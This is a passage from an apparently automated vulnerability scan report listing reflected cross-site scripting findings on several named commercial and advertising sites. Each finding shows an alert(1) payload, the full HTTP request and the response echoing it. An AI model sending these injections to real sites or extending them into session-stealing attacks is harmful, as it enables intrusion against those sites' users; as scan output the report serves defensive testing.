Issue detail

The value of the var request parameter is copied into the HTML document as plain text between tags. The payload db541<script>alert(1)</script>b2102473944 was submitted in the var parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service/api?method=liveclicker.widget.getList&account_id=311&&extra_options=%7B%22ttl%22%3A%223600%22%7D&dim10=1&order=random&status=online&format=json&var=liveclicker.api_res[0]db541<script>alert(1)</script>b2102473944 HTTP/1.1
Host: sv.liveclicker.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:05:52 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Type: application/json;charset=utf-8
Connection: close
Content-Length: 3688

liveclicker.api_res[0]db541<script>alert(1)</script>b2102473944 = { "widgets" : { "widget" : [ { "widget_id" : "16997", "asset_id" : "28930", "versionNumber" : "1", "title" : "Choosing the Right Home for Your Bird", "length" : "1:13", "rating" : "0", "views" : "15
...[SNIP]...

3.349. http://sv.liveclicker.net/service/getEmbed [div_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sv.liveclicker.net
Path:   /service/getEmbed

Issue detail

The value of the div_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afae6'%3balert(1)//c977e495a0 was submitted in the div_id parameter. This input was echoed as afae6';alert(1)//c977e495a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service/getEmbed?client_id=311&widget_id=16411&player_custom_id=479&width=210&height=158&div_id=cont_mediaplayer_16411afae6'%3balert(1)//c977e495a0 HTTP/1.1
Host: sv.liveclicker.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:05:52 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Cache-Control: max-age=1800
Content-Type: text/javascript
Connection: close
Content-Length: 15351

var xml_16411={"roll_campaign_id": "295", "prerolls": [{ "skip_label": "", "location": "http://hcdn.liveclicker.net/z7a3u7c3/cds/videos/311/33073_1_Flv_320x180_h264.flv", "asset" : "33073-1", "fullscr
...[SNIP]...
.split('|'),0,{}));var flashVars_16411; var e=document.createElement('div'); e.id='Liveclicker_video_16411'; e.setAttribute('class','Liveclicker_video'); document.getElementById('cont_mediaplayer_16411afae6';alert(1)//c977e495a0').appendChild(e); function lcwrite_16411() {flashVars_16411 = new Object(); var f_e = ['skinPath','petcebto','accountid',311,'urlaccount','http://www.petco.com','urllogo','http://www.petco.com','accou
...[SNIP]...

3.350. http://sv.liveclicker.net/service/getEmbed [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sv.liveclicker.net
Path:   /service/getEmbed

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 627f5"%3balert(1)//8807ffa17c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 627f5";alert(1)//8807ffa17c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service/getEmbed?client_id=311&widget_id=18811&width=275&height=190&player_custom_id=429&627f5"%3balert(1)//8807ffa17c4=1 HTTP/1.1
Host: sv.liveclicker.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:05:08 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Cache-Control: max-age=1800
Content-Type: text/javascript
Connection: close
Content-Length: 15064

var xml_18811={"image": "http://hcdn.liveclicker.net/z7a3u7c3/cds/thumbnails/311/32820_1_Flv_320x180_thumb_1.jpg", "location": "http://hcdn.liveclicker.net/z7a3u7c3/cds/videos/311/32820_1_Flv_320x180_h264.flv", "affiliate_support": "0", "length": "76.408", "scriptsrc": "http://sv.liveclicker.net/service/getEmbed?627f5";alert(1)//8807ffa17c4=1&client_id=311&player_custom_id=429&widget_id=18811", "fullscreen_location": "http://hcdn.liveclicker.net/z7a3u7c3/cds/videos/311/32820_1_Flv_1280x720_h264.flv", "links": [{ "start_time": "-1", "end_
...[SNIP]...

3.351. http://sv.liveclicker.net/service/getEmbed [player_custom_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sv.liveclicker.net
Path:   /service/getEmbed

Issue detail

The value of the player_custom_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a64df"%3balert(1)//9118063e94 was submitted in the player_custom_id parameter. This input was echoed as a64df";alert(1)//9118063e94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service/getEmbed?client_id=311&widget_id=18811&width=275&height=190&player_custom_id=429a64df"%3balert(1)//9118063e94 HTTP/1.1
Host: sv.liveclicker.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:05:08 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Cache-Control: max-age=1800
Content-Type: text/javascript
Connection: close
Content-Length: 14963

var xml_18811={"image": "http://hcdn.liveclicker.net/z7a3u7c3/cds/thumbnails/311/32820_1_Flv_320x180_thumb_1.jpg", "location": "http://hcdn.liveclicker.net/z7a3u7c3/cds/videos/311/32820_1_Flv_320x180_h264.flv", "affiliate_support": "0", "length": "76.408", "scriptsrc": "http://sv.liveclicker.net/service/getEmbed?client_id=311&player_custom_id=429a64df";alert(1)//9118063e94&widget_id=18811", "fullscreen_location": "http://hcdn.liveclicker.net/z7a3u7c3/cds/videos/311/32820_1_Flv_1280x720_h264.flv", "links": [{ "start_time": "-1", "end_time": "-2", "text": "Petco", "link":
...[SNIP]...

3.352. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The value of the ckc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e4e"><script>alert(1)</script>d5d9a5d69c was submitted in the ckc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webrec/wr.do?client=ARMANIEXCHANGE&sessionId=520E7931-C882-5A58-0CA3-DD8D145EC0E2&ns=1&pt=hcat&categoryname=Womens&ckc=87e4e"><script>alert(1)</script>d5d9a5d69c&mbcc=4F3F8B20-763A-5480-90F3-DFE588224975&lang=en&v=5.0.0&mbts=1317384195289&rf=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.armaniexchange.com/category/womens.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:04:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=i8BaIcPB1wtpmTbFALn6DFkrUKTUrOK/PzhQOKdQFqqgYQmdVeghIQesor0qSXa4LI+57IlYpCk=; Domain=.mybuys.com; Expires=Wed, 18-Oct-2079 15:18:31 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 326

<html>
<body>
<iframe width="0" height="0" frameborder="0" id="mbadn" scrolling="no" style="display: none;" src="http://ads.p.veruta.com/adserver/track?merchantid=854445219&category=87e4e"><script>alert(1)</script>d5d9a5d69c&cmid=4F3F8B20-763A-5480-90F3-DFE588224975&itemid=&eventid=0&ifmode=1">
...[SNIP]...

3.353. http://ts.istrack.com/trackingAPI.js [vti parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ts.istrack.com
Path:   /trackingAPI.js

Issue detail

The value of the vti request parameter is copied into the HTML document as plain text between tags. The payload 96d62<script>alert(1)</script>d7bfbc18e73 was submitted in the vti parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackingAPI.js?ai=qq58S2mEuHNcyMUndnIpK+NoJdfVOT1z&evt=21&ri=13200&ii=11280&vti=YUPutwoBC2cAAAx@cYwAAAAAABOUS9tR4FyeWW96d62<script>alert(1)</script>d7bfbc18e73 HTTP/1.1
Host: ts.istrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.mcafee.com/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:23:09 GMT
Server: Apache
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 114
Connection: close
Content-Type: text/javascript; charset=utf-8

ISVT_setCookie('isvt_visitor', 'YUPutwoBC2cAAAx@cYwAAAAAABOUS9tR4FyeWW96d62<script>alert(1)</script>d7bfbc18e73');

3.354. http://voken.eyereturn.com/ [320863&click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://voken.eyereturn.com
Path:   /

Issue detail

The value of the 320863&click request parameter is copied into the HTML document as plain text between tags. The payload 88767<script>alert(1)</script>512582641e5 was submitted in the 320863&click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?320863&click=http://adserver.adtechus.com/adlink/5330/1959687/0/225/AdId=2013056;BnId=1;itime=386884446;key=key1+key2+key3+key4;nodecode=yes;link=88767<script>alert(1)</script>512582641e5&params=386884446 HTTP/1.1
Host: voken.eyereturn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 30 Sep 2011 12:52:47 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: erTok="AwAAAAB6+AQAJBcmAAgAAHv4BAAkFyYABgAA"; Domain=.eyereturn.com; Expires=Sun, 29-Sep-2013 12:52:47 GMT; Path=/
Expires: Fri, 30 Sep 2011 12:52:46 GMT
Content-Length: 16715

//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved //
er_CID='8793';er_SegID='320863';er_imgSrc='http://resources.eyereturn.com/8793/008793_falling_fruit40-728x90_v1.jpg';er_tokenID='325754';er_wsID='2767';er_RedirURL='http://adserver.adtechus.com/adlink/5330/1959687/0/225/AdId=2013056;BnId=1;itime=386884446;key=key1 key2 key3 key4;nodecode=yes;link=88767<script>alert(1)</script>512582641e5http://www.pcfinancial.ca/easydoesit';er_clickURL='http://adserver.adtechus.com/adlink/5330/1959687/0/225/AdId=2013056;BnId=1;itime=386884446;key=key1 key2 key3 key4;nodecode=yes;link=88767<script>
...[SNIP]...

3.355. http://voken.eyereturn.com/pb/get [320863&click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://voken.eyereturn.com
Path:   /pb/get

Issue detail

The value of the 320863&click request parameter is copied into the HTML document as plain text between tags. The payload ccb61<script>alert(1)</script>dad60a824f6 was submitted in the 320863&click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pb/get?320863&click=http://adserver.adtechus.com/adlink/5330/1959687/0/225/AdId=2013056;BnId=1;itime=386884446;key=key1+key2+key3+key4;nodecode=yes;link=ccb61<script>alert(1)</script>dad60a824f6&params=386884446 HTTP/1.1
Host: voken.eyereturn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]
Cookie: er_guid=3FAED14C-268F-2EBA-8AFA-B4A3CC734F22

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 30 Sep 2011 12:52:48 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: erTok="AwAAAAB6+AQAJBcmAAoAAHv4BAAkFyYACAAA"; Domain=.eyereturn.com; Expires=Sun, 29-Sep-2013 12:52:48 GMT; Path=/
Expires: Fri, 30 Sep 2011 12:52:47 GMT
Content-Length: 16707

//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved //
er_CID='8793';er_SegID='320863';er_imgSrc='http://resources.eyereturn.com/8793/008793_free_food40-728x90_v1.jpg';er_tokenID='325755';er_wsID='2767';er_RedirURL='http://adserver.adtechus.com/adlink/5330/1959687/0/225/AdId=2013056;BnId=1;itime=386884446;key=key1 key2 key3 key4;nodecode=yes;link=ccb61<script>alert(1)</script>dad60a824f6http://www.pcfinancial.ca/freeiseasy';er_clickURL='http://adserver.adtechus.com/adlink/5330/1959687/0/225/AdId=2013056;BnId=1;itime=386884446;key=key1 key2 key3 key4;nodecode=yes;link=ccb61<script>
...[SNIP]...

3.356. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget [jsonpcallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.aisle7.net
Path:   /api/1.0/widgets/general/newswire-widget

Issue detail

The value of the jsonpcallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f00ae%3balert(1)//483e73d5ace was submitted in the jsonpcallback parameter. This input was echoed as f00ae;alert(1)//483e73d5ace in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/1.0/widgets/general/newswire-widget?apikey=00617ba4d64547b589e1e8b3dac082be&format=html&styles=enhanced&content_only=true&ref=http%3A%2F%2Fwww.gnc.com%2Fhome%2Findex.jsp&links=resource-path-encoded&request_handler_uri=http%3A%2F%2Fwww.gnc.com%2Fshop%2Findex.jsp%3FcategoryId%3D10813502%26resource%3D&clientscript=1&jsonpcallback=jsonp1317384210484f00ae%3balert(1)//483e73d5ace HTTP/1.1
Host: web.aisle7.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.gnc.com/home/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aisle7c6=1786451762.1.3046266304.2510907471

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:06:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Hni-Request-Id: 3c91be39-2eca-4616-bf9e-585a62585b81
Content-Language: en-us
Hni-Response-Time-Ms: 0
Cache-Control: public
Last-Modified: Mon, 12 Sep 2011 22:29:39 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 3758

jsonp1317384210484f00ae;alert(1)//483e73d5ace("\u003clink rel=\"StyleSheet\" type=\"text/css\" href=\"http://web.aisle7.net/styles/dynamic/963/10006272/enhanced.css\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003c/link\u003e\u003cscript type=
...[SNIP]...

3.357. http://www.abesofmaine.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abesofmaine.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46345"><script>alert(1)</script>faae217052f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?46345"><script>alert(1)</script>faae217052f=1 HTTP/1.1
Host: www.abesofmaine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:24:29 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-45590fe9=d89adda9:0; path=/
Content-Length: 34237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3
...[SNIP]...
<meta property="og:url" content="http://www.abesofmaine.com/?46345"><script>alert(1)</script>faae217052f=1" />
...[SNIP]...

3.358. http://www.abesofmaine.com/category.do [group1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abesofmaine.com
Path:   /category.do

Issue detail

The value of the group1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62321"><script>alert(1)</script>0622e46f7fa was submitted in the group1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category.do?group1=Televisions62321"><script>alert(1)</script>0622e46f7fa HTTP/1.1
Host: www.abesofmaine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.abesofmaine.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=150C0F5AD67ECB7B292EE612F6C4A165; mbcc=676EA379-F0C8-59EC-AFE2-7BB8BFBA7057; mbcs=A5A36BBB-76A4-506C-0B69-FAFDA6CDBD37; __utma=11070564.628728169.1317385471.1317385471.1317385471.1; __utmb=11070564.1.10.1317385471; __utmc=11070564; __utmz=11070564.1317385471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-45590fe9=d89adda9:0

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:26:13 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-45590fe9=d89adda9:0; path=/
Content-Length: 25389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3
...[SNIP]...
<meta property="og:url" content="http://www.abesofmaine.com/category.do?group1=Televisions62321"><script>alert(1)</script>0622e46f7fa" />
...[SNIP]...

3.359. http://www.abesofmaine.com/category.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abesofmaine.com
Path:   /category.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d512f"><script>alert(1)</script>dd7d784137c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category.do?group1=Televisions&d512f"><script>alert(1)</script>dd7d784137c=1 HTTP/1.1
Host: www.abesofmaine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.abesofmaine.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=150C0F5AD67ECB7B292EE612F6C4A165; mbcc=676EA379-F0C8-59EC-AFE2-7BB8BFBA7057; mbcs=A5A36BBB-76A4-506C-0B69-FAFDA6CDBD37; __utma=11070564.628728169.1317385471.1317385471.1317385471.1; __utmb=11070564.1.10.1317385471; __utmc=11070564; __utmz=11070564.1317385471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-45590fe9=d89adda9:0

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:26:21 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-45590fe9=d89adda9:0; path=/
Content-Length: 32220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3
...[SNIP]...
<meta property="og:url" content="http://www.abesofmaine.com/category.do?group1=Televisions&d512f"><script>alert(1)</script>dd7d784137c=1" />
...[SNIP]...

3.360. https://www.abesofmaine.com/accountMenu.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.abesofmaine.com
Path:   /accountMenu.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6973d"><script>alert(1)</script>47a4ff413c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accountMenu.do?6973d"><script>alert(1)</script>47a4ff413c3=1 HTTP/1.1
Host: www.abesofmaine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:50:34 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-45590fe9=d89adda9:0; path=/
Content-Length: 33209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3
...[SNIP]...
<meta property="og:url" content="http://www.abesofmaine.com/accountMenu.do?6973d"><script>alert(1)</script>47a4ff413c3=1" />
...[SNIP]...

3.361. http://www.armaniexchange.com/search.do [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.armaniexchange.com
Path:   /search.do

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload ed906<a%20b%3dc>6e337f98fb4 was submitted in the query parameter. This input was echoed as ed906<a b=c>6e337f98fb4 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search.do?action=ac&query=xssed906<a%20b%3dc>6e337f98fb4 HTTP/1.1
Host: www.armaniexchange.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/plain, */*
Referer: http://www.armaniexchange.com/category/womens/jackets+blazers.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=a377d831b7efcba1cb9051464a59.armaniexchange-b2c-i3; mbcc=4F3F8B20-763A-5480-90F3-DFE588224975; customer=none; basket=none; s_cc=true; s_sq=%5B%5BB%5D%5D; mbcs=520E7931-C882-5A58-0CA3-DD8D145EC0E2; fsr.s={"v":1,"rid":"1317384198720_321367","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":4.5,"c":"http://www.armaniexchange.com/category/womens/jackets+blazers.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1317384250139}; gpv_p4l=Categories/Womens/Jackets%20%26%20Blazers

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Length: 55
Content-Type: text/html;charset=UTF-8
Expires: Fri, 30 Sep 2011 12:08:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:08:56 GMT
Connection: close
Set-Cookie: customer=none; Expires=Sun, 13-Oct-2013 12:08:56 GMT; Path=/
Set-Cookie: basket=none; Expires=Fri, 14-Oct-2011 12:08:56 GMT; Path=/
Set-Cookie: abtest=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: abtestversion=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

{"query":"xssed906<a b=c>6e337f98fb4","suggestions":[]}

3.362. http://www.fingerhut.com/catalog/search.cmd [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fingerhut.com
Path:   /catalog/search.cmd

Issue detail

The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28630"%3balert(1)//f551f39996d was submitted in the keyword parameter. This input was echoed as 28630";alert(1)//f551f39996d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

